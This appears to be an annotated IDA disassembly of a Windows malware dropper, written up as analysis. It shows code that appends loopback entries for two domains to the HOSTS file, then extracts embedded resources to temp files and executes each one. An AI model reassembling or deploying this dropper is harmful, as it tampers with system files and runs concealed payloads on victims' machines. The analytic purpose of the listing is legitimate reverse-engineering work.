;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	11DB3F85EDCF2406FF81705D9B8F46CC

; File Name   :	u:\work\11db3f85edcf2406ff81705d9b8f46cc_orig.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 00000226 (	550.)
; Section size in file		: 00000400 (   1024.)
; Offset to raw	data for section: 00000400
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default

		; MASM target directives emitted by IDA: P6 instruction set including
		; privileged instructions, MMX, flat 32-bit memory model.
		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
; NOTE(review): the section header above reports flags E0000020 (code section
; marked Writable), so the constants below share a read/write/execute page
; with the code -- worth noting for anyone checking W^X properties of the image.
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; char String2[]
; Appended to the system directory by start (NT-family path of the HOSTS file).
String2		db '\DRIVERS\ETC',0     ; DATA XREF: start+18o
; char aHosts[]
; Appended to the directory chosen in start to form the final HOSTS path.
aHosts		db '\HOSTS',0           ; DATA XREF: start:loc_40108Ao
; char PrefixString[]
; Three-letter prefix handed to GetTempFileNameA for the dropped files.
PrefixString	db 'DIL',0              ; DATA XREF: start+D9o
; 3Ah (58) bytes written verbatim to the end of the HOSTS file by the
; WriteFile call at start+7F. Read as little-endian bytes the dwords spell:
;   "\r\n127.0.0.1 dl2.teenpassage.com\r\n127.0.0.1 ntkrnlpa.info\r\n"
; i.e. two hosts entries that point those names at the loopback address
; (14 dwords = 56 bytes, plus the trailing 0Dh,0Ah = 58).
dword_401018	dd 32310A0Dh, 2E302E37h, 20312E30h, 2E326C64h, 6E656574h
					; DATA XREF: start+7Fo
		dd 73736170h, 2E656761h, 0D6D6F63h, 3732310Ah, 302E302Eh
		dd 6E20312Eh, 6E726B74h, 2E61706Ch, 6F666E69h
		db 0Dh,	0Ah

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn

		public start

;-----------------------------------------------------------------------
; start -- program entry point (noreturn). All calls are stdcall Win32 imports,
; so arguments are pushed right-to-left and the callee pops them.
;
; What this listing shows the sample doing:
;   1. Pick the HOSTS path: <SystemDirectory>\DRIVERS\ETC\HOSTS when the sign
;      bit of GetVersion's result is clear (NT family), otherwise
;      <WindowsDirectory>\HOSTS. Open it with OPEN_ALWAYS, seek to the end and
;      append the 3Ah bytes at dword_401018 (two "127.0.0.1 <name>" lines).
;      Only the CreateFileA handle is checked; every other result is ignored.
;   2. Enumerate RT_RCDATA (lpType = 0Ah) resources by integer ID 1, 2, 3, ...
;      (lpName holds the integer, MAKEINTRESOURCE style). Each one found is
;      copied into a fresh %TEMP%\DIL*.tmp file and started with
;      CreateProcessA. The loop ends at the first ID FindResourceA cannot find.
;   3. ExitProcess(0).
;
; Register roles: edi = current file HANDLE, ebp = HRSRC, esi = locked resource
; bytes. StartupInfo is used as a 104h-byte path buffer (44h struct + 30h dwords
; of padding declared in _data) before StartupInfo.cb is set and it becomes a
; real STARTUPINFOA. The handles CreateProcessA returns in ProcessInformation
; are never closed. No stack frame is set up; callee-saved edi/esi/ebp are
; clobbered, which only works because this function never returns.
;-----------------------------------------------------------------------
start		proc near
		call	GetVersion	; GetVersion
		test	eax, eax
		js	short loc_40107B	; sign bit set => non-NT platform, HOSTS lives in the Windows dir
		push	104h		; uSize = MAX_PATH
		push	offset StartupInfo ; lpBuffer
		call	GetSystemDirectoryA	; GetSystemDirectoryA
		push	offset String2	; "\\DRIVERS\\ETC"
		push	offset StartupInfo ; lpString1
		call	lstrcatA	; lstrcatA -- no remaining-space check against the 104h buffer
		jmp	short loc_40108A
; ---------------------------------------------------------------------------


loc_40107B:				; CODE XREF: start+7j
		push	104h		; uSize
		push	offset StartupInfo ; lpBuffer
		call	GetWindowsDirectoryA	; GetWindowsDirectoryA


loc_40108A:				; CODE XREF: start+27j
		push	offset aHosts	; "\\HOSTS"
		push	offset StartupInfo ; lpString1
		call	lstrcatA	; lstrcatA -- StartupInfo now holds the full HOSTS path
		push	0		; hTemplateFile
		push	0		; dwFlagsAndAttributes
		push	4		; dwCreationDisposition = OPEN_ALWAYS
		push	0		; lpSecurityAttributes
		push	1		; dwShareMode = FILE_SHARE_READ
		push	40000000h	; dwDesiredAccess = GENERIC_WRITE
		push	offset StartupInfo ; lpFileName
		call	CreateFileA	; CreateFileA
		mov	edi, eax
		cmp	eax, 0FFFFFFFFh	; INVALID_HANDLE_VALUE => skip the HOSTS edit entirely
		jz	short loc_4010E2
		push	2		; dwMoveMethod = FILE_END (append)
		push	0		; lpDistanceToMoveHigh
		push	0		; lDistanceToMove
		push	edi		; hFile
		call	SetFilePointer	; SetFilePointer
		push	0		; lpOverlapped
		push	offset NumberOfBytesWritten ; lpNumberOfBytesWritten
		push	3Ah		; nNumberOfBytesToWrite = 58 = whole dword_401018 blob
		push	offset dword_401018 ; lpBuffer
		push	edi		; hFile
		call	WriteFile	; WriteFile -- return value and bytes written are ignored
		push	edi		; hObject
		call	CloseHandle	; CloseHandle


loc_4010E2:				; CODE XREF: start+65j
		mov	lpName,	1	; first resource ID (integer ID, MAKEINTRESOURCE style)


loc_4010EC:				; CODE XREF: start+161j
		push	0Ah		; lpType = RT_RCDATA
		push	lpName		; lpName
		push	0		; hModule = this image
		call	FindResourceA	; FindResourceA
		test	eax, eax
		mov	ebp, eax	; ebp = HRSRC (mov does not disturb the flags from test)
		jz	loc_4011B8	; first missing ID ends the loop
		push	ebp		; hResInfo
		push	0		; hModule
		call	LoadResource	; LoadResource
		push	eax		; hResData
		call	LockResource	; LockResource
		mov	esi, eax	; esi = resource bytes; a NULL result is not checked
		push	offset StartupInfo ; lpBuffer
		push	104h		; nBufferLength
		call	GetTempPathA	; GetTempPathA
		push	offset ApplicationName ; lpTempFileName
		push	0		; uUnique = 0: the API picks a unique name and creates the file
		push	offset PrefixString ; "DIL"
		push	offset StartupInfo ; lpPathName
		call	GetTempFileNameA	; GetTempFileNameA -> %TEMP%\DILxxxx.tmp in ApplicationName
		push	0		; hTemplateFile
		push	0		; dwFlagsAndAttributes
		push	2		; dwCreationDisposition = CREATE_ALWAYS
		push	0		; lpSecurityAttributes
		push	0		; dwShareMode = exclusive
		push	40000000h	; dwDesiredAccess = GENERIC_WRITE
		push	offset ApplicationName ; lpFileName
		call	CreateFileA	; CreateFileA
		mov	edi, eax
		cmp	eax, 0FFFFFFFFh	; INVALID_HANDLE_VALUE => skip this ID, continue with the next
		jz	short loc_4011AD
		push	ebp		; hResInfo
		push	0		; hModule
		call	SizeofResource	; SizeofResource
		push	0		; lpOverlapped
		push	offset NumberOfBytesWritten ; lpNumberOfBytesWritten
		push	eax		; nNumberOfBytesToWrite = resource size in bytes
		push	esi		; lpBuffer
		push	edi		; hFile
		call	WriteFile	; WriteFile -- result ignored
		push	edi		; hObject
		call	CloseHandle	; CloseHandle
		mov	StartupInfo.cb,	44h	; sizeof(STARTUPINFOA); from here StartupInfo is a real struct
		push	offset StartupInfo ; lpStartupInfo
		call	GetStartupInfoA	; GetStartupInfoA
		push	offset ProcessInformation ; lpProcessInformation
		push	offset StartupInfo ; lpStartupInfo
		push	0		; lpCurrentDirectory
		push	0		; lpEnvironment
		push	0		; dwCreationFlags
		push	0		; bInheritHandles
		push	0		; lpThreadAttributes
		push	0		; lpProcessAttributes
		push	0		; lpCommandLine
		push	offset ApplicationName ; lpApplicationName
		call	CreateProcessA	; CreateProcessA -- result ignored; hProcess/hThread never closed


loc_4011AD:				; CODE XREF: start+106j
		inc	lpName		; next integer resource ID
		jmp	loc_4010EC
; ---------------------------------------------------------------------------


loc_4011B8:				; CODE XREF: start+ADj
		push	0		; uExitCode
		call	ExitProcess	; ExitProcess
start		endp

; ---------------------------------------------------------------------------
		align 10h
; NOTE(review): each collapsed 6-byte function below is the import thunk IDA
; created for the same-named __imp_* slot in _idata (those extrn lines carry a
; read xref from the thunk). The size is consistent with a single
; `jmp dword ptr [__imp_X]` (FF 25 disp32), but the bytes are not shown here.
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD	"+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA. PRESS KEYPAD	"+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateProcessA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD	"+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION FindResourceA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetStartupInfoA. PRESS KEYPAD "+"	TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetSystemDirectoryA. PRESS KEYPAD	"+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempFileNameA.	PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempPathA. PRESS KEYPAD "+" TO	EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetVersion. PRESS	KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetWindowsDirectoryA. PRESS KEYPAD "+" TO	EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LoadResource. PRESS KEYPAD "+" TO	EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LockResource. PRESS KEYPAD "+" TO	EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION SetFilePointer. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION SizeofResource. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION lstrcatA.	PRESS KEYPAD "+" TO EXPAND]
		align 200h
_text		ends

; Section 2. (virtual address 00002000)
; Virtual size			: 000001E0 (	480.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00000800
; Flags	40000040: Data Readable
; Alignment	: default
;
; Imports from KERNEL32.dll
;
; ===========================================================================

; Segment type:	Externs
; _idata
; BOOL __stdcall CloseHandle(HANDLE hObject)
		; Import address table: 17 dword slots starting at the top of section 2
		; (RVA 2000h, the FirstThunk of the descriptor in _rdata), each read by
		; the 6-byte thunk of the same name in _text. 17 slots + NUL = 48h bytes,
		; which is exactly where _rdata begins (org 402048h).
		extrn __imp_CloseHandle:dword ;	DATA XREF: CloseHandler
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
		extrn __imp_CreateFileA:dword ;	DATA XREF: CreateFileAr
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
		extrn __imp_CreateProcessA:dword ; DATA	XREF: CreateProcessAr
; void __stdcall ExitProcess(UINT uExitCode)
		extrn __imp_ExitProcess:dword ;	DATA XREF: ExitProcessr
; HRSRC	__stdcall FindResourceA(HMODULE	hModule,LPCSTR lpName,LPCSTR lpType)
		extrn __imp_FindResourceA:dword	; DATA XREF: FindResourceAr
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA	lpStartupInfo)
		extrn __imp_GetStartupInfoA:dword ; DATA XREF: GetStartupInfoAr
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
		extrn __imp_GetSystemDirectoryA:dword ;	DATA XREF: GetSystemDirectoryAr
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
		extrn __imp_GetTempFileNameA:dword ; DATA XREF:	GetTempFileNameAr
; DWORD	__stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
		extrn __imp_GetTempPathA:dword ; DATA XREF: GetTempPathAr
; DWORD	__stdcall GetVersion()
		extrn __imp_GetVersion:dword ; DATA XREF: GetVersionr
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer,UINT uSize)
		extrn __imp_GetWindowsDirectoryA:dword ; DATA XREF: GetWindowsDirectoryAr
; HGLOBAL __stdcall LoadResource(HMODULE hModule,HRSRC hResInfo)
		extrn __imp_LoadResource:dword ; DATA XREF: LoadResourcer
; LPVOID __stdcall LockResource(HGLOBAL	hResData)
		extrn __imp_LockResource:dword ; DATA XREF: LockResourcer
; DWORD	__stdcall SetFilePointer(HANDLE	hFile,LONG lDistanceToMove,PLONG lpDistanceToMoveHigh,DWORD dwMoveMethod)
		extrn __imp_SetFilePointer:dword ; DATA	XREF: SetFilePointerr
; DWORD	__stdcall SizeofResource(HMODULE hModule,HRSRC hResInfo)
		extrn __imp_SizeofResource:dword ; DATA	XREF: SizeofResourcer
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID	lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
		extrn __imp_WriteFile:dword ; DATA XREF: WriteFiler
; LPSTR	__stdcall lstrcatA(LPSTR lpString1,LPCSTR lpString2)
		extrn __imp_lstrcatA:dword ; DATA XREF:	lstrcatAr


; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read
; NOTE(review): this segment is the PE import directory, not program constants.
; Reading the raw dwords against the layout (org 402048h):
;   402048h  IMAGE_IMPORT_DESCRIPTOR { OriginalFirstThunk = 2070h, TimeDateStamp = 0,
;            ForwarderChain = 0, Name = 21D2h, FirstThunk = 2000h (the IAT in _idata) }
;   40205Ch  all-zero terminating descriptor (5 dup(0))
;   402070h  import name table: 17 RVAs (20B8h..21C6h) plus a 0 terminator,
;            one per extrn in _idata
;   4020B8h  IMAGE_IMPORT_BY_NAME entries: a 16-bit hint followed by the ASCII
;            function name; IDA only labelled the names that landed on an
;            alignment boundary, the rest appear as hex dwords
;   end      the dwords 454B0000h, 4C454E52h, 642E3233h, 6C6Ch spell
;            "\0\0KERNEL32.dll\0\0", matching the descriptor's Name RVA
_rdata		segment	para public 'DATA' use32
		assume cs:_rdata
		;org 402048h
		dd 2070h, 2 dup(0)
		dd 21D2h, 2000h, 5 dup(0)
		dd 20B8h, 20C6h, 20D4h,	20E6h, 20F4h, 2104h, 2116h, 212Ch
		dd 2140h, 2150h, 215Eh,	2176h, 2186h, 2196h, 21A8h, 21BAh
		dd 21C6h, 0
		dd 6C430019h, 4865736Fh, 6C646E61h, 320065h, 61657243h
		dd 69466574h, 41656Ch, 72430042h, 65746165h, 636F7250h
		dd 41737365h, 750000h, 74697845h, 636F7250h, 737365h, 69460093h
		dd 6552646Eh, 72756F73h, 416563h, 6547013Bh, 61745374h
		dd 70757472h, 6F666E49h, 1440041h
aGetsystemdirec	db 'GetSystemDirectoryA',0
		dd 6547014Eh, 6D655474h, 6C694670h, 6D614E65h, 4165h, 65470150h
		dd 6D655474h, 74615070h, 4168h,	6547015Fh, 72655674h, 6E6F6973h
		dd 1640000h
aGetwindowsdire	db 'GetWindowsDirectoryA',0
		align 2
		dw 1AEh				; hint for LoadResource
aLoadresource	db 'LoadResource',0
		align 2
		dw 1BCh				; hint for LockResource
aLockresource	db 'LockResource',0
		align 2
		dw 24Bh				; hint for SetFilePointer
aSetfilepointer	db 'SetFilePointer',0
		align 4
		dd 69530272h, 666F657Ah, 6F736552h, 65637275h, 2B90000h
		dd 74697257h, 6C694665h, 2D30065h, 7274736Ch, 41746163h
		dd 454B0000h, 4C454E52h, 642E3233h, 6C6Ch, 8 dup(0)
_rdata		ends

; Section 3. (virtual address 00003000)
; Virtual size			: 00000220 (	544.)
; Section size in file		: 00000000 (	  0.)
; Offset to raw	data for section: 00000000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
; Uninitialised globals used by start. Everything here is plain scratch state;
; nothing is initialised in the image (section size in file is 0).
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 403000h
; DWORD	NumberOfBytesWritten
; Sink for the lpNumberOfBytesWritten argument of both WriteFile calls in start;
; never read back.
NumberOfBytesWritten dd	?		; DATA XREF: start+75o	start+112o
; LPCSTR lpName
; Typed LPCSTR by IDA, but start only ever stores small integers (1, 2, 3, ...)
; here and passes them to FindResourceA as integer resource IDs.
lpName		dd ?			; DATA XREF: start:loc_4010E2w
					; start+9Cr ...
; struct _STARTUPINFOA StartupInfo
; 44h-byte struct followed by 30h dwords (0C0h bytes) of padding = 104h bytes,
; which is why start can pass it as a MAX_PATH string buffer to
; GetSystemDirectoryA / GetWindowsDirectoryA / GetTempPathA before setting
; StartupInfo.cb and reusing it as a real STARTUPINFOA.
StartupInfo	_STARTUPINFOA <?>	; DATA XREF: start+Eo start+1Do ...
		dd 30h dup(?)
; char ApplicationName[]
; MAX_PATH buffer filled by GetTempFileNameA; the same path is then opened with
; CreateFileA and handed to CreateProcessA as lpApplicationName.
ApplicationName	db 104h	dup(?)		; DATA XREF: start+D2o	start+F7o ...
; struct _PROCESS_INFORMATION ProcessInformation
; Overwritten by CreateProcessA on every loop iteration; the hProcess/hThread
; handles it receives are never closed or read.
ProcessInformation _PROCESS_INFORMATION	<?> ; DATA XREF: start+139o
_data		ends


		end start